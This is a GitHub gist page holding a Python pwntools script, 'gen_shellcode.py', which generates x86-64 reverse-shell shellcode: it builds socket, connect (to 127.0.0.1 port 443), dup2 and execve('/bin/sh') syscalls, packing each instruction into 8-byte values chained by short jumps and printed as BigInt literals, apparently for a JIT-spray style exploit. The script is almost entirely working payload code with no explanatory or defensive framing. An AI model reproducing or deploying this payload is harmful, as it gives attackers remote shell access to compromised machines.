Skip to content

Instantly share code, notes, and snippets.

@jopraveen

jopraveen/gen_shellcode.py Secret

Created October 23, 2024 19:37
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save jopraveen/6f49466fdc38af6161cd2de3ce1ac586 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save jopraveen/6f49466fdc38af6161cd2de3ce1ac586 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gen_shellcode.py
from pwn import *
context(arch='amd64')
jmp = b'\xeb\x0c'
global current_byte
current_byte = 0x90
global read_bytes
read_bytes = 0
def junk_byte():
global current_byte
global read_bytes
current_byte = (current_byte + read_bytes + 0x17) & 0xFF
read_bytes += 1
return current_byte.to_bytes(1,byteorder="big")
global made
made = 0
def make_double(code):
assert len(code) <= 6
global made
tojmp = 0xc
# tojmp = 0x12
if made > 14:
tojmp += 3
jmp = b'\xeb'
tojmp += 6-len(code)
made = made+1
jmp += tojmp.to_bytes(1, byteorder='big')
print("0x"+hex(u64((code+jmp).ljust(8, junk_byte())))[2:].rjust(16,'0').upper()+"n,")
## socket(2,1,6)
make_double(asm('xor rax,rax'))
make_double(asm('xor rdi,rdi'))
make_double(asm('xor rsi,rsi'))
make_double(asm('xor rdx,rdx'))
make_double(asm('xor r8,r8'))
make_double(asm('push 0x2'))
make_double(asm('pop rdi'))
make_double(asm('push 0x1'))
make_double(asm('pop rsi'))
make_double(asm('push 0x6'))
make_double(asm('pop rdx; push 0x29'))
make_double(asm(' mov rcx,r12'))
make_double(asm('pop rax; syscall'))
## connect syscall
make_double(asm('mov r8,rax'))
make_double(asm('xor rsi,rsi'))
make_double(asm('xor r10,r10'))
make_double(asm('push r10'))
make_double(asm("mov BYTE PTR [rsp],0x2"))
## port crafting
make_double(asm("mov BYTE PTR [rsp+0x1],0x0"))
make_double(asm("mov BYTE PTR [rsp+0x2], 0x01"))
make_double(asm("mov BYTE PTR [rsp+0x3], 0xbb"))
## IP crafting
make_double(asm("mov BYTE PTR [rsp+0x4], 0x7f"))
make_double(asm("mov BYTE PTR [rsp+0x5], 0x00"))
make_double(asm("mov BYTE PTR [rsp+0x6], 0x00"))
make_double(asm("mov BYTE PTR [rsp+0x7], 0x01"))
## remaining connect
make_double(asm('mov rsi,rsp'))
make_double(asm('push 0x10'))
make_double(asm('pop rdx'))
make_double(asm('push r8'))
make_double(asm('pop rdi'))
make_double(asm('push 0x2a'))
make_double(asm('pop rax'))
make_double(asm('syscall'))
## dup2 syscall & jmp handling
make_double(asm('xor rsi,rsi'))
make_double(asm('push 0x3'))
make_double(asm('pop rsi'))
make_double(asm('dec rsi'))
make_double(asm('push 0x21'))
make_double(asm('pop rax'))
make_double(asm('syscall'))
# print("0x9090909090909f75n") # for jmping
print("0x0feb90909090a275n,") # for jmping (correct)
## exceve syscall
make_double(asm('xor rdi,rdi'))
make_double(asm('push rdi'))
make_double(asm('push rdi'))
make_double(asm('pop rsi'))
make_double(asm('pop rdx'))
# execve single byte chain
make_double(asm("push 0x1337"))
make_double(asm("pop rdi; push rdi"))
make_double(asm("mov rdi, rsp;"))
make_double(asm("mov BYTE PTR [rdi], 0x2f"))
make_double(asm("mov BYTE PTR [rdi+0x1], 0x62"))
make_double(asm("mov BYTE PTR [rdi+0x2], 0x69"))
make_double(asm("mov BYTE PTR [rdi+0x3], 0x6e"))
make_double(asm("mov BYTE PTR [rdi+0x4], 0x2f"))
make_double(asm("mov BYTE PTR [rdi+0x5], 0x73"))
make_double(asm("mov BYTE PTR [rdi+0x6], 0x68"))
make_double(asm("mov BYTE PTR [rdi+0x7], 0x00"))
make_double(asm('push 0x3b'))
make_double(asm('pop rax'))
make_double(asm('syscall'))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment